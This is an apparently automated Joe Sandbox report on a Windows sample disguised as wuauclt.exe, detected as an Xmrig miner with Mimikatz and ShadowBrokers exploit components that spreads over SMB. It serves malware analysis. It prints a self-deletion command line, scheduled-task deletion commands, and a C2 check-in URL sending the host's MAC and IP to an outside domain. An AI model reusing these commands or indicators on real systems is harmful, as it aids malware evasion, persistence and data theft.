Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wuauclt.exe

Overview

General Information

Sample Name:wuauclt.exe
Analysis ID:576901
MD5:a5cc0738a563489458f6541c3d3dc722
SHA1:c4647225139bfde320f51f7af5751c33930f3787
SHA256:032f2e845d2b9832c7845bc6a7de650ee2148891c8ee442fe3f3a8478e588dbe
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Found stalling execution ending in API Sleep call
Found strings related to Crypto-Mining
Machine Learning detection for sample
Allocates memory in foreign processes
Self deletion via cmd delete
Injects a PE file into a foreign processes
DLL side loading technique detected
Connects to many different private IPs (likely to spread or exploit)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Creates a Windows Service pointing to an executable in C:\Windows
Writes to foreign memory regions
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Machine Learning detection for dropped file
Connects to many different private IPs via SMB (likely to spread or exploit)
Contains functionality to detect sleep reduction / modifications
Found decision node followed by non-executed suspicious APIs
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Modifies existing windows services
Sigma detected: Dllhost Internet Connection
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected non-DNS traffic on DNS port
Dropped file seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Sigma detected: Wuauclt Network Connection
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Found evaded block containing many API calls
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information

Classification

Process Tree

  • System is w10x64
  • wuauclt.exe (PID: 6556 cmdline: "C:\Users\user\Desktop\wuauclt.exe" MD5: A5CC0738A563489458F6541C3D3DC722)
    • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5620 cmdline: cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6952 cmdline: ping 127.0.0.1 -n 5 MD5: 70C24A306F768936563ABDADB9CA9108)
      • cmd.exe (PID: 7112 cmdline: cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • svchost.exe (PID: 5008 cmdline: C:\Windows\SysWOW64\svchost.exe -k netsvcs MD5: FA6C268A5B5BDA067A901764D203D433)
    • schtasks.exe (PID: 1844 cmdline: /End /TN "\Microsoft\Windows\UPnP\RpcPolicyHost" MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 492 cmdline: /Delete /TN "\Microsoft\Windows\UPnP\RpcPolicyHost" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ctfmon.exe (PID: 1744 cmdline: C:\Windows\system32\ctfmon.exe MD5: 12764C4EC54842D1790BD8FA91033268)
    • dllhostex.exe (PID: 7088 cmdline: C:\Windows\system32\dllhostex.exe MD5: D0C6EDC58729D88970CB9EE8A456457C)
      • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • SearchProtocolHost.exe (PID: 6632 cmdline: C:\Windows\system32\searchprotocolhost.exe MD5: 0C5FF66721629A124F1C9F67E18A64DB)
    • dllhost.exe (PID: 4768 cmdline: C:\Windows\system32\dllhost.exe MD5: 70E2034A1C3D0ECCB73F57E33D4BFFA0)
    • dllhost.exe (PID: 6576 cmdline: C:\Windows\system32\dllhost.exe MD5: 70E2034A1C3D0ECCB73F57E33D4BFFA0)
    • svchost.exe (PID: 3144 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • WUDHostServices.exe (PID: 4044 cmdline: C:\Windows\system32\WUDHostServices.exe MD5: FC7880429D850789E40808D1AB45C119)
    • svchost.exe (PID: 3416 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • WUDHostServices.exe (PID: 4344 cmdline: C:\Windows\system32\WUDHostServices.exe MD5: FC7880429D850789E40808D1AB45C119)
    • ctfmon.exe (PID: 5808 cmdline: C:\Windows\system32\ctfmon.exe MD5: 12764C4EC54842D1790BD8FA91033268)
    • ctfmon.exe (PID: 6160 cmdline: C:\Windows\system32\ctfmon.exe MD5: 12764C4EC54842D1790BD8FA91033268)
    • svchost.exe (PID: 3828 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • WUDHostServices.exe (PID: 3984 cmdline: C:\Windows\system32\WUDHostServices.exe MD5: FC7880429D850789E40808D1AB45C119)
  • svchost.exe (PID: 1496 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1500 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3120 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\SysWOW64\WUDHostServices.exehacktool_windows_mimikatz_copywriteMimikatz credential dump tool: Author copywrite@fusionrace
  • 0xad64:$s4: Build with love for POC only
  • 0xab80:$s5: gentilkiwi (Benjamin DELPY)
  • 0xacc8:$s5: gentilkiwi (Benjamin DELPY)
  • 0xadc0:$s8: kiwi flavor !
C:\Windows\SysWOW64\dllhostex.exeCoinMiner_StringsDetects mining pool protocol string in ExecutableFlorian Roth
  • 0x12af38:$sa1: stratum+tcp://
C:\Windows\SysWOW64\dllhostex.exePUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth
  • 0x13aaaa:$s05: --nicehash
C:\Windows\SysWOW64\dllhostex.exeMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
  • 0x12cc35:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
  • 0x12c528:$s1: [%s] login error code: %d
C:\Windows\SysWOW64\dllhostex.exeJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000010.00000000.695613920.00000000013CC000.00000008.00000001.01000000.00000005.sdmpPUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth
    • 0xaaa:$s05: --nicehash
    00000010.00000000.695573100.00000000013AE000.00000002.00000001.01000000.00000005.sdmpCoinMiner_StringsDetects mining pool protocol string in ExecutableFlorian Roth
    • 0xe538:$sa1: stratum+tcp://
    00000010.00000000.695573100.00000000013AE000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000010.00000000.696093152.00000000013CC000.00000008.00000001.01000000.00000005.sdmpPUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth
      • 0xaaa:$s05: --nicehash
      00000010.00000000.696628096.00000000013CC000.00000008.00000001.01000000.00000005.sdmpPUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth
      • 0xaaa:$s05: --nicehash
      Click to see the 23 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      23.2.dllhost.exe.28a2c68.1.unpackhacktool_windows_mimikatz_copywriteMimikatz credential dump tool: Author copywrite@fusionrace
      • 0xc964:$s4: Build with love for POC only
      • 0xc780:$s5: gentilkiwi (Benjamin DELPY)
      • 0xc8c8:$s5: gentilkiwi (Benjamin DELPY)
      • 0xc9c0:$s8: kiwi flavor !
      2.3.svchost.exe.4b82a68.60.raw.unpackhacktool_windows_mimikatz_copywriteMimikatz credential dump tool: Author copywrite@fusionrace
      • 0xd964:$s4: Build with love for POC only
      • 0xd780:$s5: gentilkiwi (Benjamin DELPY)
      • 0xd8c8:$s5: gentilkiwi (Benjamin DELPY)
      • 0xd9c0:$s8: kiwi flavor !
      2.3.svchost.exe.4f37468.18.unpackhacktool_windows_mimikatz_copywriteMimikatz credential dump tool: Author copywrite@fusionrace
      • 0x9b80:$s5: gentilkiwi (Benjamin DELPY)
      33.0.ctfmon.exe.7c7468.4.unpackhacktool_windows_mimikatz_copywriteMimikatz credential dump tool: Author copywrite@fusionrace
      • 0x9b80:$s5: gentilkiwi (Benjamin DELPY)
      29.0.svchost.exe.8d7468.4.unpackhacktool_windows_mimikatz_copywriteMimikatz credential dump tool: Author copywrite@fusionrace
      • 0x9b80:$s5: gentilkiwi (Benjamin DELPY)
      Click to see the 277 entries

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspect Svchost Activity
      Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\system32\svchost.exe, CommandLine: C:\Windows\system32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\svchost.exe -k netsvcs, ParentImage: C:\Windows\SysWOW64\svchost.exe, ParentProcessId: 5008, ProcessCommandLine: C:\Windows\system32\svchost.exe, ProcessId: 3144
      Source: Network ConnectionAuthor: bartblaze: Data: DestinationIp: 8.8.8.8, DestinationIsIpv6: false, DestinationPort: 53, EventID: 3, Image: C:\Windows\SysWOW64\dllhost.exe, Initiated: true, ProcessId: 4768, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49902
      Source: Network ConnectionAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: DestinationIp: 72.52.178.23, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\user\Desktop\wuauclt.exe, Initiated: true, ProcessId: 6556, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49766
      Source: Process startedAuthor: frack113: Data: Command: cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe", CommandLine: cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\wuauclt.exe" , ParentImage: C:\Users\user\Desktop\wuauclt.exe, ParentProcessId: 6556, ProcessCommandLine: cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe", ProcessId: 5620

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: http://log.boreye.com/ipc.html?mac=EC:F4:BB:EA:15:88&ip=192.168.2.4&host=581804&tick=71min&c=Install_DoneAvira URL Cloud: Label: malware
      Antivirus detection for dropped file
      Source: C:\Windows\NetworkDistribution\cnli-0.dllAvira: detection malicious, Label: TR/ShadowBrokers.xbdrs
      Source: C:\Windows\SysWOW64\FunctionProtocolHost.dllAvira: detection malicious, Label: HEUR/AGEN.1107841
      Source: C:\Windows\NetworkDistribution\adfw.dllAvira: detection malicious, Label: TR/ShadowBrokers.gpoeb
      Source: C:\Windows\NetworkDistribution\adfw-2.dllAvira: detection malicious, Label: TR/ShadowBrokers.bhlos
      Source: C:\Windows\NetworkDistribution\cnli-1.dllAvira: detection malicious, Label: EXP/Equation.H
      Source: C:\Windows\SysWOW64\dllhostex.exeAvira: detection malicious, Label: HEUR/AGEN.1134782
      Multi AV Scanner detection for submitted file
      Source: wuauclt.exeVirustotal: Detection: 83%Perma Link
      Source: wuauclt.exeMetadefender: Detection: 54%Perma Link
      Source: wuauclt.exeReversingLabs: Detection: 96%
      Antivirus / Scanner detection for submitted sample
      Source: wuauclt.exeAvira: detected
      Multi AV Scanner detection for dropped file
      Source: C:\Windows\NetworkDistribution\adfw-2.dllMetadefender: Detection: 83%Perma Link
      Source: C:\Windows\NetworkDistribution\adfw-2.dllReversingLabs: Detection: 96%
      Source: C:\Windows\NetworkDistribution\adfw.dllMetadefender: Detection: 69%Perma Link
      Source: C:\Windows\NetworkDistribution\adfw.dllReversingLabs: Detection: 89%
      Source: C:\Windows\NetworkDistribution\cnli-0.dllMetadefender: Detection: 75%Perma Link
      Source: C:\Windows\NetworkDistribution\cnli-0.dllReversingLabs: Detection: 92%
      Source: C:\Windows\NetworkDistribution\cnli-1.dllMetadefender: Detection: 75%Perma Link
      Source: C:\Windows\NetworkDistribution\cnli-1.dllReversingLabs: Detection: 96%
      Source: C:\Windows\SysWOW64\WUDHostServices.exeMetadefender: Detection: 33%Perma Link
      Source: C:\Windows\SysWOW64\WUDHostServices.exeReversingLabs: Detection: 68%
      Source: C:\Windows\SysWOW64\dllhostex.exeMetadefender: Detection: 53%Perma Link
      Source: C:\Windows\SysWOW64\dllhostex.exeReversingLabs: Detection: 89%
      Machine Learning detection for sample
      Source: wuauclt.exeJoe Sandbox ML: detected
      Machine Learning detection for dropped file
      Source: C:\Windows\SysWOW64\FunctionProtocolHost.dllJoe Sandbox ML: detected
      Source: C:\Windows\SysWOW64\WUDHostServices.exeJoe Sandbox ML: detected
      Source: C:\Windows\SysWOW64\dllhostex.exeJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_002546E0 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,0_2_002546E0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD53DF0 CryptAcquireContextW,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureW,CryptDestroyHash,CryptReleaseContext,2_2_6FD53DF0
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_00964920 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,15_2_00964920
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FA4920 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,21_2_02FA4920
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_02864920 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,23_2_02864920
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E04920 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,24_2_02E04920

      Exploits

      barindex
      Connects to many different private IPs (likely to spread or exploit)
      Source: global trafficTCP traffic: 192.168.2.2:445
      Source: global trafficTCP traffic: 192.168.2.1:57084
      Source: global trafficTCP traffic: 192.168.2.8:445
      Source: global trafficTCP traffic: 192.168.2.39:445
      Source: global trafficTCP traffic: 192.168.2.7:445
      Source: global trafficTCP traffic: 192.168.2.38:445
      Source: global trafficTCP traffic: 192.168.2.9:445
      Source: global trafficTCP traffic: 192.168.2.3:445
      Source: global trafficTCP traffic: 192.168.2.6:445
      Source: global trafficTCP traffic: 192.168.2.5:445
      Source: global trafficTCP traffic: 192.168.2.42:445
      Source: global trafficTCP traffic: 192.168.2.41:445
      Source: global trafficTCP traffic: 192.168.2.44:445
      Source: global trafficTCP traffic: 192.168.2.43:445
      Source: global trafficTCP traffic: 192.168.2.46:445
      Source: global trafficTCP traffic: 192.168.2.45:445
      Source: global trafficTCP traffic: 192.168.2.48:445
      Source: global trafficTCP traffic: 192.168.2.47:445
      Source: global trafficTCP traffic: 192.168.2.40:445
      Source: global trafficTCP traffic: 192.168.2.28:445
      Source: global trafficTCP traffic: 192.168.2.27:445
      Source: global trafficTCP traffic: 192.168.2.29:445
      Source: global trafficTCP traffic: 192.168.2.31:445
      Source: global trafficTCP traffic: 192.168.2.30:445
      Source: global trafficTCP traffic: 192.168.2.33:445
      Source: global trafficTCP traffic: 192.168.2.32:445
      Source: global trafficTCP traffic: 192.168.2.35:445
      Source: global trafficTCP traffic: 192.168.2.34:445
      Source: global trafficTCP traffic: 192.168.2.37:445
      Source: global trafficTCP traffic: 192.168.2.36:445
      Source: global trafficTCP traffic: 192.168.2.17:445
      Source: global trafficTCP traffic: 192.168.2.16:445
      Source: global trafficTCP traffic: 192.168.2.19:445
      Source: global trafficTCP traffic: 192.168.2.18:445
      Source: global trafficTCP traffic: 192.168.2.20:445
      Source: global trafficTCP traffic: 192.168.2.22:445
      Source: global trafficTCP traffic: 192.168.2.21:445
      Source: global trafficTCP traffic: 192.168.2.24:445
      Source: global trafficTCP traffic: 192.168.2.23:445
      Source: global trafficTCP traffic: 192.168.2.26:445
      Source: global trafficTCP traffic: 192.168.2.25:445
      Source: global trafficTCP traffic: 192.168.2.49:445
      Source: global trafficTCP traffic: 192.168.2.53:445
      Source: global trafficTCP traffic: 192.168.2.52:445
      Source: global trafficTCP traffic: 192.168.2.11:445
      Source: global trafficTCP traffic: 192.168.2.55:445
      Source: global trafficTCP traffic: 192.168.2.10:445
      Source: global trafficTCP traffic: 192.168.2.54:445
      Source: global trafficTCP traffic: 192.168.2.13:445
      Source: global trafficTCP traffic: 192.168.2.57:445
      Source: global trafficTCP traffic: 192.168.2.12:445
      Source: global trafficTCP traffic: 192.168.2.56:445
      Source: global trafficTCP traffic: 192.168.2.15:445
      Source: global trafficTCP traffic: 192.168.2.59:445
      Source: global trafficTCP traffic: 192.168.2.14:445
      Source: global trafficTCP traffic: 192.168.2.58:445
      Source: global trafficTCP traffic: 192.168.2.51:445
      Source: global trafficTCP traffic: 192.168.2.50:445
      Connects to many different private IPs via SMB (likely to spread or exploit)
      Source: global trafficTCP traffic: 192.168.2.2:445
      Source: global trafficTCP traffic: 192.168.2.1:445
      Source: global trafficTCP traffic: 192.168.2.8:445
      Source: global trafficTCP traffic: 192.168.2.39:445
      Source: global trafficTCP traffic: 192.168.2.7:445
      Source: global trafficTCP traffic: 192.168.2.38:445
      Source: global trafficTCP traffic: 192.168.2.9:445
      Source: global trafficTCP traffic: 192.168.2.3:445
      Source: global trafficTCP traffic: 192.168.2.6:445
      Source: global trafficTCP traffic: 192.168.2.5:445
      Source: global trafficTCP traffic: 192.168.2.42:445
      Source: global trafficTCP traffic: 192.168.2.41:445
      Source: global trafficTCP traffic: 192.168.2.44:445
      Source: global trafficTCP traffic: 192.168.2.43:445
      Source: global trafficTCP traffic: 192.168.2.46:445
      Source: global trafficTCP traffic: 192.168.2.45:445
      Source: global trafficTCP traffic: 192.168.2.48:445
      Source: global trafficTCP traffic: 192.168.2.47:445
      Source: global trafficTCP traffic: 192.168.2.40:445
      Source: global trafficTCP traffic: 192.168.2.28:445
      Source: global trafficTCP traffic: 192.168.2.27:445
      Source: global trafficTCP traffic: 192.168.2.29:445
      Source: global trafficTCP traffic: 192.168.2.31:445
      Source: global trafficTCP traffic: 192.168.2.30:445
      Source: global trafficTCP traffic: 192.168.2.33:445
      Source: global trafficTCP traffic: 192.168.2.32:445
      Source: global trafficTCP traffic: 192.168.2.35:445
      Source: global trafficTCP traffic: 192.168.2.34:445
      Source: global trafficTCP traffic: 192.168.2.37:445
      Source: global trafficTCP traffic: 192.168.2.36:445
      Source: global trafficTCP traffic: 192.168.2.17:445
      Source: global trafficTCP traffic: 192.168.2.16:445
      Source: global trafficTCP traffic: 192.168.2.19:445
      Source: global trafficTCP traffic: 192.168.2.18:445
      Source: global trafficTCP traffic: 192.168.2.20:445
      Source: global trafficTCP traffic: 192.168.2.22:445
      Source: global trafficTCP traffic: 192.168.2.21:445
      Source: global trafficTCP traffic: 192.168.2.24:445
      Source: global trafficTCP traffic: 192.168.2.23:445
      Source: global trafficTCP traffic: 192.168.2.26:445
      Source: global trafficTCP traffic: 192.168.2.25:445
      Source: global trafficTCP traffic: 192.168.2.49:445
      Source: global trafficTCP traffic: 192.168.2.53:445
      Source: global trafficTCP traffic: 192.168.2.52:445
      Source: global trafficTCP traffic: 192.168.2.11:445
      Source: global trafficTCP traffic: 192.168.2.55:445
      Source: global trafficTCP traffic: 192.168.2.10:445
      Source: global trafficTCP traffic: 192.168.2.54:445
      Source: global trafficTCP traffic: 192.168.2.13:445
      Source: global trafficTCP traffic: 192.168.2.57:445
      Source: global trafficTCP traffic: 192.168.2.12:445
      Source: global trafficTCP traffic: 192.168.2.56:445
      Source: global trafficTCP traffic: 192.168.2.15:445
      Source: global trafficTCP traffic: 192.168.2.59:445
      Source: global trafficTCP traffic: 192.168.2.14:445
      Source: global trafficTCP traffic: 192.168.2.58:445
      Source: global trafficTCP traffic: 192.168.2.51:445
      Source: global trafficTCP traffic: 192.168.2.50:445

      Bitcoin Miner

      barindex
      Yara detected Xmrig cryptocurrency miner
      Source: Yara matchFile source: 16.0.dllhostex.exe.1290000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.2.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.0.dllhostex.exe.1290000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.0.dllhostex.exe.1290000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.svchost.exe.5900000.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.0.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.svchost.exe.5900000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000010.00000000.695573100.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000000.695093675.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000000.696044384.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000000.696614695.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5008, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: dllhostex.exe PID: 7088, type: MEMORYSTR
      Source: Yara matchFile source: C:\Windows\SysWOW64\dllhostex.exe, type: DROPPED
      Found strings related to Crypto-Mining
      Source: svchost.exe, 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
      Source: svchost.exe, 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight.
      Source: svchost.exe, 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
      Source: wuauclt.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: wuauclt.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_0025F89F FindFirstFileExA,0_2_0025F89F
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0097B9D3 FindFirstFileExA,15_2_0097B9D3
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0096AA40 wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,FindNextFileW,FindClose,15_2_0096AA40
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FAAA40 wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,FindNextFileW,FindClose,21_2_02FAAA40
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FBB9D3 FindFirstFileExA,21_2_02FBB9D3
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0286AA40 wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,FindNextFileW,FindClose,23_2_0286AA40
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0287B9D3 FindFirstFileExA,23_2_0287B9D3
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E0AA40 wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,FindNextFileW,FindClose,24_2_02E0AA40
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E1B9D3 FindFirstFileExA,24_2_02E1B9D3

      Networking

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
      Source: TrafficSnort IDS: 2027470 ET TROJAN Win32/Vools Variant CnC Checkin 192.168.2.4:49766 -> 72.52.178.23:80
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.2 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.1 57084
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.8 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.39 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.7 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.38 445
      Source: C:\Windows\SysWOW64\svchost.exeDomain query: date.affordblue.com
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.9 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.3 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.6 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.5 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.42 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.41 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.44 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.43 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.46 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.45 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.48 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.47 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.40 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.28 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.27 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.29 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.31 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.30 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.33 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.32 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.35 445
